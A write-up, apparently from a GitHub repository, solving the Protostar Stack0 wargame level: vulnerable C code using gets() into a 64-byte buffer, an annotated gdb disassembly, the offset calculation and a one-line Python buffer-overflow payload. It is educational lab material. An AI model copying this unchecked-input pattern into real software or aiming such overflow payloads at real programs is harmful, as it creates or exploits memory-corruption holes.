Skip to content

Latest commit

 

History

History
77 lines (65 loc) · 2.31 KB

stack0.md

File metadata and controls

77 lines (65 loc) · 2.31 KB
Raw

Protostar :: Stack0

Here is the code for this particular exercise.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

The solution is pretty simple, first we need to find the offset between the start of buffer, and the modified variable. We can then set the modified variable to anything but 0 in order to get the program to execute the way we want. Let's start by finding this offset. Note that I've included some comments in the disassembly to make better sense of it.

$ gdb stack0
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x080483f4 <main+0>:    push   ebp
0x080483f5 <main+1>:    mov    ebp,esp
0x080483f7 <main+3>:    and    esp,0xfffffff0
0x080483fa <main+6>:    sub    esp,0x60

# modified = 0
0x080483fd <main+9>:    mov    DWORD PTR [esp+0x5c],0x0

# gets(buffer)
0x08048405 <main+17>:   lea    eax,[esp+0x1c]
0x08048409 <main+21>:   mov    DWORD PTR [esp],eax
0x0804840c <main+24>:   call   0x804830c <gets@plt>

# if (modified != 0)
0x08048411 <main+29>:   mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>:   test   eax,eax
0x08048417 <main+35>:   je     0x8048427 <main+51>

# if modified == 0
# printf("Try again?\n");
0x08048419 <main+37>:   mov    DWORD PTR [esp],0x8048500
0x08048420 <main+44>:   call   0x804832c <puts@plt>
0x08048425 <main+49>:   jmp    0x8048433 <main+63>

# if modified != 0
# printf("you have changed the 'modified' variable\n");
0x08048427 <main+51>:   mov    DWORD PTR [esp],0x8048529
0x0804842e <main+58>:   call   0x804832c <puts@plt>

0x08048433 <main+63>:   leave  
0x08048434 <main+64>:   ret    
End of assembler dump.

So we can see that the modified variable is located at $esp + 0x5c and the buffer variable is located at $esp + 0x1c. So the offset should be 0x5c - 0x1c, or 64 (unsurprisingly the length of the buffer). Therefore we need to write 64 bytes of data to fill up the buffer, plus an extra byte to write into the contents of the modified variable.

$ python -c 'print "A" * 64 + "B"' | ./stack0
you have changed the 'modified' variable